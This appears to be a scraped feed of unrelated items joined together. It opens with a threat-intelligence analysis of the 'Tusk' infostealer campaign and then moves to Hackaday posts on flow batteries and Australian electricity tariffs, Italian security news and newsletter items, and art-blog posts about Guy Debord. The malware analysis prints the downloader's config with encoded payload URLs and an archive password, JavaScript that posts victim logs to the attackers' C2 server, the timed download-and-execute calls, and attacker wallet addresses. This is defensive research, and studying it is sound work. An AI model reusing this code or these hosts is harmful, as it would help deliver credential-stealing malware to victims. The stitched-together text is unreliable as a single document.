Summary

Kaspersky Global Emergency Response Team (GERT) has identified a complex campaign, consisting of multiple sub-campaigns orchestrated by Russian-speaking cybercriminals. The sub-campaigns imitate legitimate projects, slightly modifying names and branding and using multiple social media accounts to increase their credibility. In our analysis we observed that all the active sub-campaigns host the initial downloader on Dropbox. This downloader is responsible for delivering additional malware samples to the victim’s machine, which are mostly infostealers (Danabot and StealC) and clippers. Besides this, the actors use phishing to trick users into providing additional sensitive information, such as credentials, which can then be sold on the dark web or used to gain unauthorized access to their gaming accounts and cryptocurrency wallets and drain their funds directly.

We identified three active sub-campaigns (at the time of analysis) and 16 inactive sub-campaigns related to this activity. We dubbed it “Tusk”, as the threat actor uses the word “Mammoth” in log messages of initial downloaders — at least in the three active sub-campaigns we analyzed. “Mammoth” is slang used by Russian-speaking threat actors to refer to victims. Mammoths used to be hunted by ancient people and their tusks were harvested and sold.

Analysis of the inactive sub-campaigns suggests that these are either old campaigns or campaigns that haven’t started yet. In this post, we analyze three most recently active sub-campaigns. Here is the timeline for the sub-campaigns in question:

Campaign timeline

First sub-campaign (TidyMe)

In this campaign the actor simulated peerme.io, a platform for the creation and management of decentralized autonomous organizations (DAOs) on the MultiversX blockchain. It aims to empower crypto communities and projects by providing tools for governance, funding, and collaboration within a decentralized framework. The malicious website is tidyme[.]io.

First sub-campaign: malicious and original sites

As you can see in the image above, the malicious website contains a “Download” button instead of the “Create your Team now” button on the legitimate website. Clicking this button sends a request to the webserver with User-Agent as an argument. The webserver uses this data to determine which version of the malicious file to send to the victim. The details are shown in the diagram below:

Malicious webserver routine to download the appropriate malware version depending on the user’s operating system

This campaign has several malware samples for macOS and Windows, both hosted on Dropbox. In this post we will explore Windows samples only.

In addition to distributing malware, this campaign involves victims connecting their cryptocurrency wallets directly through the campaign’s website. To investigate further, we created a test wallet with a small balance and linked it to the site. However, no withdrawal transactions were initiated in the course of this study. The purpose of this action was to expose the threat actor’s cryptocurrency wallet address for subsequent blockchain analysis.

During our investigation, the threat actors transitioned their infrastructure to the domains tidymeapp[.]io and tidyme[.]app. The domain tidymeapp[.]io now hosts an updated version of the initial downloader, incorporating additional anti-analysis techniques. Despite these changes, its primary objective remains the same: to download and execute subsequent stages. Analysis of these new samples is still underway, nevertheless their IoCs are included in the IoCs section in this report. Details of the analysis for the previous samples from tidyme[.]io are provided below.

Initial downloader (TidyMe.exe)

This sample is an Electron application. After its execution, a CAPTCHA form is displayed and the victim must enter the code to proceed. No malicious activities will be carried out until the victim passes the CAPTCHA check, suggesting that the threat actors added it to prevent execution using automatic dynamic analysis tools (e.g. sandboxes).

CAPTCHA form

It’s worth mentioning that the CAPTCHA is handled internally in the JavaScript file captcha.js as opposed to being handled by a third party, which suggests the attackers’ intent of making sure the victim executes the sample.

After the user passes the CAPTCHA check, the sample launches the main application interface which resembles a profile page. But even if the user enters some information here, nothing will happen. At the same time, the sample begins downloading the two additional malicious files in the background, which are then executed.

Main interface for TidyMe.exe

Downloader routine

The tidyme.exe sample contains a configuration file called config.json which contains base64-encoded URLs and a password for archived data decompression, which is used to download the second-stage payloads. Here is the content of the file:
{
"archive": "aHR0cHM6Ly93d3cuZHJvcGJveC5jb20vc2NsL2ZpL2N3NmpzYnA5ODF4eTg4dHprM29ibS91cGRhdGVsb2FkLnJhcj9ybGtleT04N2c5NjllbTU5OXZub3NsY2dseW85N2ZhJnN0PTFwN2RvcHNsJmRsPTE=",
"password": "newfile2024",
"bytes": "aHR0cDovL3Rlc3Rsb2FkLnB5dGhvbmFueXdoZXJlLmNvbS9nZXRieXRlcy9m"
}
The table below lists the decoded URLs:

The main downloader functionality is stored in preload.js file in two functions,
downloadAndExtractArchive and loadFile. The function downloadAndExtractArchive retrieves the field archive from the configuration file, which is an encoded Dropbox link, decodes it and stores the file from Dropbox to the path %TEMP%/archive-<RANDOM_STRING>. The downloaded file is a password-protected RAR file which will be extracted with the value of the field password in the configuration file, then all .exe files from this archive are executed.
The
loadFile function retrieves the field bytes from the configuration file, decodes it using base64, and sends a GET request to the resulting URL. The response contains a byte array which will be converted to bytes and written to the path %TEMP%/<MD5_HASH_OF_CURRENT_TIME>.exe. Following a successful download, this function decodes the file, appends 750000000 bytes to its end and then executes it.
These two functions, in addition to other functions, are exported, which allows the rendering processes to call them in the file named script.js with some delay after the user passes the CAPTCHA check. Here is the code responsible for calling these functions:
setTimeout(() => {
window.api.downloadAndExtractArchive()
}, 10000)

setTimeout(() => {
window.api.loadFile()
}, 100000)
...
In addition to the two functions above, the sample contains a function called
sendRequest. This function is responsible for sending log messages to the threat actor’s C2 server using HTTP POST messages to the URL hxxps[:]//tidyme[.]io/api.php. Below is the function’s code:async function sendRequest(data) {
const formData = new URLSearchParams();
Object.entries(data).forEach(([key, value]) => {
formData.append(key, value);
});

const response = await fetch('https://tydime.io/api.php', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: formData,
});
return response.json();
}
Here is an example of the data which was passed to the
sendRequest function as arguments:const { v4: uuidv4 } = require('uuid');
const randomUUID = uuidv4();

let data = {
key: "aac1ff44",
type: "customlog",
code: randomUUID,
message: "Нет действия..."
};
The messages sent to the C2 server are in Russian; the table below shows the messages along with the English translation:

The following diagram shows the download routine for this sample:

Initial downloader routine – TidyMe.exe

In this campaign, both updateload.exe and bytes.exe are the same file with the following hashes:

• MD5: B42F971AC5AAA48CC2DA13B55436C277
• SHA1: 5BF729C6A67603E8340F31BAC2083F2A4359C24B
• SHA256: C990A578A32D545645B51C2D527D7A189A7E09FF7DC02CEFC079225900F296AC

Payload (updateload.exe and bytes.exe)

This sample utilizes HijackLoader, a modular loader with different capabilities such as UAC bypass, various process injection techniques, and inline API hooking evasion. After updateload.exe (or bytes.exe) is dropped and executed, it starts a series of process injections starting with injecting shellcode into cmd.exe, then deletes itself, after which the malicious code injected into cmd.exe injects another shellcode into explorer.exe. Both shellcodes are the 32-bit version. As a result of the injection chain, the final stage is executed in the context of the explorer.exe process, which is a variant of the infostealer malware family StealC. The final payload starts communicating with the threat actor’s C2 server, downloading additional legitimate DLLs to be used during the collection and sending of information about the infected system, including the following:

• HWID (unique ID for the infected system calculated by the malware from C drive serial number);
• Build Number (meowsterioland4);

• Network Info
  
  • IP;
  • Country;

  
  

• System Summary
  
  • Hardware ID from the operating system;
  • OS;
  • Architecture;
  • Username;
  • Local time;
  • Installed apps;
  • All users;
  • Current user;
  • Process list;

  
  

• Screenshot.

Then it will start requesting configurations from the C2 server, which is a public IP, for the data to be collected. The following table lists the configurations along with their description:

The diagram below illustrates the execution steps for this sample:

First sub-campaign – updateload.exe

Identifying additional sub-campaigns

Having completed our analysis of the first sub-campaign, we conducted cyberthreat intelligence (CTI) and OSINT activities aiming to collect as much information as possible related to the threat actor and this specific campaign. Looking at the DNS records for the first campaign (TidyMe), we identified MX records with the value _dc-mx.bf442731a463[.]tidyme[.]io. Resolving this domain to an A record returns the IP 79.133.180[.]213. Utilizing Kaspersky Threat Intelligence Portal (TIP), we were able to identify all historical and present domains associated with this IP. Below is a list of all the domains:

From the domains above, only the first three were active during our analysis. We already explored tidyme[.]io, so we’ll discuss the other two active sub-campaigns next.

In addition to the link between the domains and the IP, all three active campaigns imitate legitimate projects and contain a download link to an initial downloader malware. The diagram below shows the correlation between the different campaigns:

Sub-campaigns correlation

Second sub-campaign (RuneOnlineWorld)

In this campaign, the threat actor was simulating the website of an MMO game. The original website domain is riseonlineworld.com, while the malicious website is runeonlineworld[.]io.

Second sub-campaign: malicious and original sites

The malicious website contains a download link for the initial downloader, imitating the game launcher. The downloader is hosted on Dropbox and it follows the same logic described in the TidyMe section (the first sub-campaign) to obtain the appropriate downloader for the victim’s operating system. The sample name is RuneOnlineWorld.exe.

Initial downloader (RuneOnlineWorld.exe)

This sample is also an Electron application with mostly the same structure and logic as the initial downloader in the first sub-campaign. There are different URLs in the configuration file, but otherwise most of the changes involve the main interface of the application: it resembles a login page rather than a profile page. Moreover, the login page does actually process the entered data.

First, the password is checked for complexity. If the check is passed, the username and password are sent to the C2. Then a loading page is displayed which is essentially a mockup to give the background tasks enough time to download the additional malicious files. The following diagram shows the steps taken by the downloader:

Initial downloader routine – RuneOnlineWorld.exe

First payload (updateload.exe)

In the RuneOnlineWorld campaign the two payloads are no longer the same file. Updateload.exe utilizes HijackLoader and injects code to multiple legitimate programs to evade detection. It starts by injecting code into cmd.exe then to explorer.exe. After that, the malicious code injected into explorer.exe starts communicating with multiple C2 servers to download additional malicious DLL and MSI files and save them to the path C:\Users\<USERNAME>\Appdata\. After downloading the malicious files, explorer.exe executes the MSI files using msiexec.exe and the DLL files using rundll32.exe. The final stage for this sample is multiple infostealers from the malware families Danabot and StealC (injected into explorer.exe). The diagram below shows the execution routine for this sample:

Second sub-campaign – updateload.exe

Second payload (bytes.exe)

This sample also uses HijackLoader to evade detection, unpacks different stages of the payload and injects them into legitimate processes. First, it creates and injects malicious code into cmd.exe, which injects code into explorer.exe and then into OpenWith.exe — a legitimate Windows process. The malicious code injected into OpenWith.exe downloads the next stage from the threat actor’s C2 (another public IP), decodes it and injects it into another OpenWith.exe instance. In this stage, the payload downloads six files to the directory %APPDATA%\AD_Security\ and creates a scheduled task named FJ_load which will execute the file named madHcCtrl.exe at login for persistence. Here is a list of files downloaded by this stage:

All of these DLL and EXE files are legitimate, except madHcNet32.dll. The malicious files wickerwork.indd and bufotenine.yml contain encrypted data.

The following diagram shows the steps taken by this sample to extract the final payload:

Second sub-campaign – bytes.exe

madHcNet32.dll

madHcCtrl.exe loads and executes madHcNet32.dll, which, in turn, utilizes HijackLoader to extract and execute the final payload. After execution, madHcCtrl.exe injects the next stage to cmd.exe, then the final stage is injected to explorer.exe. The final payload is clipper malware written in GO. This sample is based on open-source clipper malware. The following diagram shows the execution steps for this sample:

Second sub-campaign – madHcNet32.dll

The clipper monitors the clipboard data. If a cryptocurrency wallet address is copied to the clipboard, it substitutes it with the following one:

• BTC: 1DSWHiAW1iSFYVb86WQQUPn57iQ6W1DjGo

In addition, the sample contains unique strings such as the ones below:

• C:/Users/Helheim/
• C:/Users/Helheim/Desktop/clipper no autorun/mainTIMER.go

While searching for samples that contain the same strings, we identified additional samples with different wallet addresses:

• ETH: 0xaf0362e215Ff4e004F30e785e822F7E20b99723A
• BTC: bc1qqkvgqtpwq6g59xgwr2sccvmudejfxwyl8g9xg0

We identified some transactions on the second and third wallet addresses. There were no transactions related to the first wallet address at the time of writing this post.

The second wallet was seen active from March 4 to July 31 and received a total of 9.137 ETH. The third one was active between April 2 and August 6 with 0.0209 BTC received in total. Note that these addresses were only observed in the clipper malware. This campaign also utilizes infostealers to steal software-based cryptocurrency wallets which could be used to gain access to the victim’s funds, although we have not seen such activity. In addition, the infostealers collect credentials from browsers and other sources which could allow the threat actor to gain access to other services used by the victim (e.g. online banking systems) or sell the stolen data on the dark web.

Third sub-campaign (Voico)

In this campaign, the threat actor was simulating an AI translator project named YOUS. The original website is yous.ai, while the malicious website is voico[.]io:

Third sub-campaign: malicious and original sites

Just like the previous two sub-campaigns, the malicious website contains a download link for the initial downloader imitating the application. The downloader is hosted on Dropbox and follows the same logic described in the first sub-campaign to download the appropriate downloader for the victim’s operating system. During our investigation, the malicious website of this campaign ceased to exist. The sample name is Voico.exe.

Initial downloader (Voico.exe)

This sample is also an Electron application with mostly the same structure as the initial downloaders in the previous two sub-campaigns. The downloader logic also remains the same. Most of the changes involve the main interface of the application, and different URLs are contained in the configuration file.

Voico.exe main interface

In addition to these changes, the sample prompts the victim to fill in a registration form, which doesn’t send the data to the C2. Instead, it passes the user’s credentials to the console.log() function:
// Теперь вы можете использовать эти значения для дальнейшей обработки или отправки на сервер
// <Translation>: Now you can use these values for further processing or sending to the server

console.log('Name:', name);
console.log('Username:', username);
console.log('Native Language:', nativeLanguage);
console.log('Voice:', voice);
console.log('Password:', password);
The following diagram shows the execution routine for this sample:

Voico.exe execution routine

Both samples in this campaign (updateload.exe and bytes.exe) have very similar behavior to the updateload.exe sample from the second sub-campaign.

Payload (updateload.exe and bytes.exe)

These samples have similar behavior as the updateload.exe sample from the second sub-campaign with one difference: the StealC malware downloaded by them communicates to a different C2 server. Other than that, the whole routine from the updateload.exe and bytes.exe execution to the final payload execution is the same. Here is a diagram of the execution routine for these samples:

Third sub-campaign – updateload.exe and bytes.exe

Possible other sub-campaigns

During the analysis of this campaign, the analyzed samples were hosted at the following paths on the attacker website: http[:]//testload.pythonanywhere.com/getbytes/f and http[:]//testload.pythonanywhere.com/getbytes/m. We didn’t find any other resources used in the current sub-campaigns (which doesn’t mean they won’t appear in the future). However, we noticed other samples hosted in different paths, unrelated to the ongoing sub-campaigns. The following is a list of paths on the PythonAnywhere website where these samples are hosted:

• http[:]//testload.pythonanywhere.com/getbytes/s
• http[:]//testload.pythonanywhere.com/getbytes/h

The hashes of the files in the new paths are already included in the IoCs list below.

Conclusion

The campaign uncovered in this report demonstrate the persistent and evolving threat posed by cybercriminals who are adept at mimicking legitimate projects to deceive victims. By exploiting the trust users place in well-known platforms, these attackers effectively deploy a range of malware designed to steal sensitive information, compromise systems, and ultimately achieve financial gain.

The reliance on social engineering techniques such as phishing, coupled with multistage malware delivery mechanisms, highlights the advanced capabilities of the threat actors involved. Their use of platforms like Dropbox to host initial downloaders, alongside the deployment of infostealer and clipper malware, points to a coordinated effort to evade detection and maximize the impact of their operations. The commonalities between different sub-campaigns and the shared infrastructure across them further suggests a well-organized operation, potentially tied to a single actor or group with specific financial motives. Our detailed analysis of the three active sub-campaigns, from the initial downloader routines to the final payloads, reveals a complex chain of attacks designed to penetrate both Windows and macOS environments.

In addition to the active sub-campaigns, the discovery of 16 inactive sub-campaigns highlights the dynamic and adaptable nature of the threat actor’s operations. These inactive sub-campaigns, which may represent either older campaigns that have been retired or new ones that have not yet been launched, illustrate the threat actor’s ability to rapidly create and deploy new malicious operations, targeting trending topics at the time of campaign. This rapid turnover suggests a well-resourced and agile adversary, capable of quickly shifting tactics and infrastructure to avoid detection and maintain the effectiveness of their campaigns. The presence of these dormant campaigns also indicates that the threat actor is likely to continue evolving their strategies, potentially reactivating these sub-campaigns or launching entirely new ones in the near future. This reinforces the need for continuous monitoring and proactive defense strategies to stay ahead of these evolving threats.

If your company has experienced a cybersecurity incident that requires an immediate response, contact Kaspersky Incident Response service.

Indicators of Compromise

URLs to third party services

Network IoCs

Host IoCs

Hashes for malicious files

Hashes for legitimate files used in the campaigns

Cryptocurrency wallet addresses

securelist.com/tusk-infosteale…

Battery news typically covers the latest, greatest laboratory or industry breakthroughs to push modern devices further and faster. Could you build your own flow battery stationary storage for home-built solar and wind rigs though?

Based on the concept of appropriate technology, the system from the Flow Battery Research Collective will be easy to construct, easy to maintain, and safe to operate in a residential environment. Current experiments are focusing on Zn/I chemistry, but other aqueous chemistries could be used in the future. Instead of an ion exchange membrane, the battery uses readily attainable photo paper and is already showing similar order of magnitude performance to lab-developed cells.

Any components that aren’t off-the-shelf have been designed in FreeCAD. While they can be 3D printed, the researchers have found traditional milling yields better results which isn’t too surprising when you need something water-tight. More work is needed, but it is promising work toward a practical, DIY-able energy storage solution.

If you’re looking to build your own open source wind turbine or solar cells to charge up a home battery system, then we’ve got you covered. You can also break the chains of the power grid with off-the-shelf parts.

Australian grids have long run a two-tiered pricing scheme for electricity. In many jurisdictions, regular electricity was charged at a certain rate. Meanwhile, you could get cheaper electricity for certain applications if your home was set up with a “controlled load.” Typically, this involved high energy equipment like pool heaters or hot water heaters.

This scheme has long allowed Australians to save money while keeping their water piping-hot at the same time. However, the electrical grid has changed significantly in the last decade. These controlled loads are starting to look increasingly out of step with what the grid and the consumer needs. What is to be done?

Controlled What Now?

Hot water heaters can draw in excess of 5 kW for hours on end when warming up. Electrical authorities figured that it would be smart to take this huge load on the grid, and shift it to night time, a period of otherwise low demand. Credit: Lewin Day
In Australia, the electricity grid has long relied on a system of “controlled loads” to manage the energy demand from high-consumption appliances, particularly electric hot water heaters. These controlled loads were designed to take advantage of periods when overall electricity demand was lower, traditionally at night. By scheduling energy-intensive activities like heating water during these off-peak hours, utilities could balance the load on the grid and reduce the need for additional power generation capacity during peak times. In turn, households would receive cheaper off-peak electricity rates for energy used by their controlled load.

This system was achieved quite simply. Households would have a special “controlled load” meter in their electrical box. This would measure energy use by the hot water heater, or whatever else the electrical authority had allowed to be hooked up in this manner. The controlled load meter would be set on a timer so the attached circuit would only be powered in the designated off-peak times. Meanwhile, the rest of the home’s electrical circuits would be connected to the main electrical meter which would provide power 24 hours a day.

By and large, this system worked well. However, it did lead to more than a few larger families running out of hot water on the regular. For example, you might have had a 250 liter hot water heater. Hooked up as a controlled load, it would heat up overnight and switch off around 7 AM. Two or three showers later, the hot water heater would have delivered all its hot water, and you’d be stuck without any more until it switched back on at night.

Historically, most electric hot water heaters were set to run during the low-demand night period, typically after 10 PM. Historically, the demand for electricity was low at this time, while peak demand was in the day time. It made sense to take the huge load from everyone’s hot water system, and move all that demand to the otherwise quiet night period. This lowered the daytime peak, reducing demand on the grid, in turn slashing infrastructure and generation costs. It had the effect of keeping the demand curve flatter throughout the whole 24-hour period.

This strategy was particularly effective in a grid predominantly powered by coal-fired power stations, which operated most efficiently when running continuously at a stable output. By shifting the hot water heating load to nighttime, utilities could maintain a more consistent demand for electricity throughout the day and night, reducing the need for sudden increases in generation capacity during peak times.

Everything Changed

The Australian grid now sees large peaks in solar generation during the day. Credit: APVI.org.au via screenshot
However, the energy landscape in Australia has undergone a significant transformation in recent years. This has been primarily driven by the rapid growth of renewable energy sources, particularly home solar generation. As a result, the dynamics of electricity supply and demand have changed, prompting a reevaluation of the traditional approach to controlled loads.

Renewable energy has completely changed the way supply and demand works in the Australian grid. These days, energy is abundant while the sun is up. During the middle of the day, wholesale energy prices routinely plummet below $0.10 / kWh as the sun bears down on thousands upon thousands of solar panels across the country. Energy becomes incredibly cheap. Meanwhile, at night, energy is now very expensive. The solar panels are all contributing nothing, and it becomes the job of coal and gas generators to carry the majority of the burden. Fossil fuels are increasingly expensive, and spikes in the wholesale price are not uncommon, at times exceeding $10 / kWh.

Solar power generation peaks are now so high that Australian cities often produce more electricity than is needed to meet demand. This excess solar energy has led to periods where electricity prices can be very low, or even negative, due to the abundance of renewable energy on the grid. As a result, there is a growing argument that it now makes more sense to shift controlled loads, such as hot water heaters, to run during the daytime rather than at night.
The rise of home solar generation has created unexpected flow-on effects for Australia’s power grid. Credit: Wayne National Forest, CC BY 2.0
Shifting controlled loads to the daytime would help absorb the surplus solar energy. This would reduce the need for grid authorities to kick renewable generators off the grid in times of excess. It would also help mitigate the so-called “duck curve” effect, where the demand for electricity sharply increases in the late afternoon and early evening as solar generation declines, leading to a steep ramp-up in non-renewable generation. By using excess solar energy to power controlled loads during the day, the overall demand on the grid would be more balanced, and the reliance on fossil fuels during peak times could be reduced.

Implementing this shift would require adjustments to the current tariff structures and perhaps the installation of smart meters capable of dynamically managing when controlled loads are activated based on real-time grid conditions. In a blessed serendipity, some Australian states—like Victoria—have already achieved near-100% penetration of smart meters. Others are still in the process of rollout, aiming for near 100% coverage by 2030. While these changes would involve some initial investment, the long-term benefits, including greater integration of renewable energy, reduced carbon emissions, and potentially lower electricity costs for consumers, make it a compelling option.

Fundamentally, it makes no sense for controlled loads to continue running as they have done for decades. Millions of Australians are now paying to heat their water during higher-demand periods where energy is more expensive. This can be particularly punitive for those on regularly-updated live tariffs that change with the current wholesale energy price. Those customers will sit by, watching cheap solar energy effectively go to waste during a sunny day, before their water heater finally kicks at night when the coal generators are going their hardest.

While the traditional approach to controlled loads in Australia has served the grid well in the past, the rise of renewable energy has changed things. The abundance of solar generation necessitates a rethinking of when these loads are scheduled. By shifting the operation of controlled loads like hot water heaters to the daytime, Australia can make better use of its abundant renewable energy resources, improve grid stability, and move closer to its sustainability goals. It’s a simple idea that makes a lot of sense. Here’s waiting for the broader power authorities to step up and make the change.

Microsoft ha avvisato gli utenti di una vulnerabilità critica TCP/IP che consente l’esecuzione di codice remoto ( RCE ) su tutti i sistemi Windows con IPv6 abilitato per impostazione predefinita.

Si tratta del CVE-2024-38063 (punteggio CVSS: 9,8), una vulnerabilità di Integer Underflow che può essere sfruttata dagli aggressori per causare un buffet overflow ed eseguire codice arbitrario su sistemi Windows 10, Windows 11 e Windows Server vulnerabili. Il bug è stato scoperto da un ricercatore di sicurezza del Kunlun Lab conosciuto con lo pseudonimo di XiaoWei.

XiaoWei ha sottolineato che, data la gravità della minaccia, non rivelerà ulteriori dettagli nel prossimo futuro. Il ricercatore ha inoltre osservato che il blocco di IPv6 attraverso il firewall locale di Windows non impedirà lo sfruttamento della vulnerabilità, poiché il bug viene attivato prima che il firewall elabori i pacchetti.

Microsoft ha spiegato nella sua comunicazione ufficiale che gli aggressori possono sfruttare il bug da remoto inviando ripetutamente pacchetti IPv6 appositamente predisposti. Il problema è caratterizzato da una bassa complessità di sfruttamento, che aumenta la probabilità del suo utilizzo negli attacchi. L’azienda ha notato che vulnerabilità simili sono state in passato oggetto di attacchi, il che rende questo errore particolarmente attraente per gli aggressori.

Per coloro che non possono installare immediatamente gli ultimi aggiornamenti di sicurezza, Microsoft consiglia di disattivare IPv6 per ridurre il rischio di attacchi. Tuttavia, l’azienda avverte che la disattivazione di IPv6 potrebbe causare il malfunzionamento di alcuni componenti di Windows , poiché il protocollo è una parte obbligatoria del sistema operativo.

Trend Micro ha definito ilCVE-2024-38063 una delle vulnerabilità più gravi risolte da Microsoft nell’ambito dell’attuale aggiornamento di sicurezza. L’azienda ha sottolineato che la vulnerabilità ha lo status di “wormable“, il che significa che può diffondersi tra i sistemi senza l’interazione dell’utente, in modo simile ai worm informatici. Trend Micro ha inoltre ricordato che IPv6 è abilitato per impostazione predefinita su quasi tutti i dispositivi, il che rende difficile prevenire gli attacchi.

L'articolo Un grave bug di sicurezza su Microsoft Windows con Score 9.8 di tipo “Wormable” porta all’RCE proviene da il blog della sicurezza informatica.

Buon sabato e ben ritrovato caro cyber User.

Eccoci al nostro appuntamento settimanale con le notizie più rilevanti dal mondo della sicurezza informatica! Questa settimana ci concentriamo su una serie di eventi che spaziano dalle azioni legali contro TikTok alle ultime minacce ransomware. Esaminiamo insieme questi sviluppi per comprendere meglio il panorama in continua evoluzione della cybersecurity.

TikTok nel mirino del Dipartimento di Giustizia e della FTC

Il Dipartimento di Giustizia degli Stati Uniti e la Federal Trade Commission (FTC) hanno intrapreso un'azione legale contro TikTok e la sua società madre, ByteDance, per presunte violazioni della Children’s Online Privacy Protection Act (COPPA). L'accusa è che TikTok avrebbe raccolto dati personali di minori senza il consenso dei genitori, sia su account standard che in modalità "Kids Mode", una versione ridotta destinata agli utenti sotto i 13 anni. TikTok ha risposto contestando le accuse, sostenendo che molte delle pratiche contestate sono ormai superate o inesatte.

Cyberattacco colpisce Mobile Guardian e scuole a livello globale

Un grave attacco informatico ha colpito Mobile Guardian, una società di gestione dispositivi mobili utilizzata da istituzioni educative in Nord America, Europa e Singapore. L'attacco ha causato l'interruzione dei servizi, con un piccolo numero di dispositivi che sono stati cancellati da remoto. In particolare, 13.000 dispositivi di studenti sono stati cancellati a Singapore, spingendo il Ministero dell'Istruzione a interrompere la collaborazione con Mobile Guardian. Attualmente, l'azienda sta lavorando per risolvere l'incidente, assicurando che non ci sono prove di accesso ai dati degli utenti da parte degli attaccanti.

Analisi dell’incidente CrowdStrike e interruzioni globali

CrowdStrike ha pubblicato un'analisi dettagliata dell'errore nel sensore Falcon EDR che ha causato disservizi globali lo scorso 19 luglio. L'errore è derivato da una discrepanza nel numero di parametri ricevuti da un interprete di contenuti, causando letture di memoria fuori limite e conseguenti crash nei sistemi Windows. Questo errore è sfuggito a vari livelli di test interni, dimostrando come anche piccole anomalie possano avere impatti significativi in ambienti complessi.

BlackSuit: La nuova minaccia ransomware

L'FBI ha aggiornato il proprio avviso sul ransomware BlackSuit, un rebrand del famigerato Royal ransomware. Da quando è emerso a settembre 2022, BlackSuit ha richiesto più di 500 milioni di dollari in riscatti, con richieste che variano tra 1 milione e 10 milioni di dollari. Il gruppo adotta tecniche sofisticate di esfiltrazione e estorsione prima di criptare i dati, utilizzando spesso email di phishing come vettore di attacco iniziale.

Arresto di un facilitatore di lavoratori IT nordcoreani

Il Dipartimento di Giustizia degli Stati Uniti ha arrestato un uomo a Nashville, Tennessee, per aver aiutato lavoratori IT nordcoreani a ottenere lavori remoti presso aziende negli Stati Uniti e nel Regno Unito. Matthew Isaac Knoot è accusato di aver gestito una "laptop farm" per far apparire i lavoratori nordcoreani come se fossero situati negli Stati Uniti, ingannando così le aziende vittime. Questi lavoratori IT, impiegati in remoto, avrebbero guadagnato fino a 300.000 dollari all'anno, generando milioni di dollari per entità legate alla Corea del Nord.

Nuove minacce APT e vulnerabilità emergenti

I ricercatori hanno scoperto un nuovo gruppo APT chiamato Actor240524, che ha preso di mira Azerbaigian e Israele con attacchi di spear-phishing. Il gruppo utilizza documenti Word con macro malevole per distribuire trojan come ABCloader e ABCsync, progettati per eludere le difese dei sistemi target. Inoltre, una grave vulnerabilità XSS è stata individuata in Roundcube, una popolare piattaforma di webmail, che potrebbe consentire agli aggressori di rubare email, contatti e password.

Emergenza ransomware e nuovi attacchi a dispositivi IP

Un nuovo ransomware chiamato CryptoKat è emerso nel dark web, con capacità di cifratura avanzate e tecniche per massimizzare l'impatto, come la mancata memorizzazione della chiave di decrittazione sul dispositivo della vittima. Questo costringe le vittime a pagare il riscatto per sperare di recuperare i propri dati. Parallelamente, Cisco ha emesso un avviso riguardo a cinque gravi vulnerabilità di esecuzione di codice remoto nei telefoni IP delle serie SPA 300 e SPA 500, ormai giunti a fine vita. Gli utenti sono invitati a passare a modelli più recenti e supportati.

😋 FunFact

WordTsar: il Wordstar del 21esimo secolo.

Infine

Il panorama della sicurezza informatica continua a evolversi rapidamente, con nuove minacce che emergono ogni settimana. Le azioni legali, gli attacchi informatici su larga scala e le scoperte di nuove vulnerabilità evidenziano la necessità di una vigilanza costante e di soluzioni tecnologiche all'avanguardia. Restate sintonizzati per ulteriori aggiornamenti e analisi su questo mondo.

Anche quest'oggi abbiamo concluso, ti ringrazio per il tempo e l'attenzione che mi hai dedicato, augurandoti buon fine settimana, ti rimando al mio blog e alla prossima settimana per un nuovo appuntamento con NINAsec.

buttondown.com/ninasec/archive…

slowforward.net/2024/08/14/guy…

slowforward

2024-08-14 12:44:42

Guy Debord (1931-1994)

Critique de la séparation (1961)
Hurlements en faveur de Sade (1952)
In Girum Imus Nocte Et Consumimur Igni (1978)
Refutation of All the Judgements, Pro or Con, Thus Far Rendered on the Film “The Society of the Spectacle” (1975)
Society of the Spectacle, Part 1 (1973)
Society of the Spectacle, Part 2 (1973)
Guy Debord, son art et son temps (1995)
Society of the Spectacle by Guy Debord with a new and unauthorized translation, voiceover by Paul Chan (2013)

Guy Debord was born in Paris on December 28, 1931. In 1950 Debord began his association with the Lettrist International, which was being led by Isidore Isou at the time. The Lettrists were attempting to fuse poetry and music, and were interested in transforming the urban landscape. In 1953 they mapped out what they called the “psychogeography” of Paris by walking through the city in a free-associative manner, or “drifts”. Texts on this activity were first published in Naked Lips in 1955 and 1956, in essays titled “Detournement: How to Use” and “Theory of the Derive.”

In 1957… →

slowforward.net/2024/08/14/guy…

#archive #archivi #archivio #cinema #GuyDebord #Situationism #Situazionismo #UbuWeb

guy debord @ ubuweb

Guy Debord (1931-1994)  Critique de la séparation (1961)  Hurlements en faveur de Sade (1952)  In Girum Imus Nocte Et Consumimur Igni (1978)  Refutation of All the Judgements, Pro or Con, Thus Far …

^slowforward

slowforward.net/2024/08/13/due…

slowforward

2024-08-13 18:05:29

_

slowforward.net/2024/08/13/due…

#asemic #asemicWriting #asemicWritingOnStone #asemicsOnStone #FabrizioMRossi #FabrizioRossi #ffffff #pietre #pietreDiLeonessa #pietreScritte #scritturaAsemica #scritturaAsemicaA #scritturaAsemicaSuPietra #scritturaSuPietra

pietra1_ fmrossi

Visita l'articolo per saperne di più.

^slowforward

slowforward.net/2024/08/14/un-…

slowforward

2024-08-14 00:00:20

machina-deriveapprodi.com/post…

.

slowforward.net/2024/08/14/un-…

#AlbertoToscano #fascismo #GranBretagna #laburisti #Machina #neofascismo #razzismo #rivolteRazziste #tories #tribalismo #whitewashing

un articolo di alberto toscano sulle violenze razziste e fasciste recenti

^slowforward

slowforward.net/2024/08/13/ins…

slowforward

2024-08-13 10:31:16

installance n. : # 0189type : asemic square size : ~ cm 6 x 6record : lowres shotadditional notes : abandoneddate : Aug 6th, 2024time : 4:31pmplace : Rome, via Lancianofootnote : ---copyright : (CC) 2024 differx
.

slowforward.net/2024/08/13/ins…

#000000 #0189 #abandoned #asemic #asemicSquare #card #i0189 #installance #installance0189

installance #0189: asemic square

  installance n. : # 0189 type : asemic square size : ~ cm 6 x 6 record : lowres shot additional notes : abandoned date : Aug 6th, 2024 time : 4:31pm place : Rome, via Lanciano footnote : — c…

^slowforward

slowforward.net/2024/08/13/the…

slowforward

2024-08-13 08:01:50

bopsecrets.org/

bopsecrets.org/comics/return.h…

_
e ci sono anche…

Testi in Italiano

(Text in Italian)

Riflessioni preliminari sulla Guerra del Vietnam (Ngo Van, 1968)
Sulle lotte del Terzo Mondo (Ngo Van, 1968)
In questo teatro… (1970)
Ode sull’assenza di vera poesia oggi questo pomeriggio (1970)
Doppia riflessione (1974)
Avviso riguardo la società dominante e coloro che la contestano (1974)
I ciechi e l’elefante (1975)
La società del situazionismo (1976)
La realizzazione e la soppressione della religione (1977)
Lettera aperta al gruppo “Libertaire” di Tokio (1977)
La breccia in Iran (1979)
Banalità (1979)
La guerra e lo spettacolo (1991)
Sul film di René Viénet: Può la dialettica spezzare i mattoni? (1992)
Due saggi critici sul buddismo impegnato (1993 & 1999)
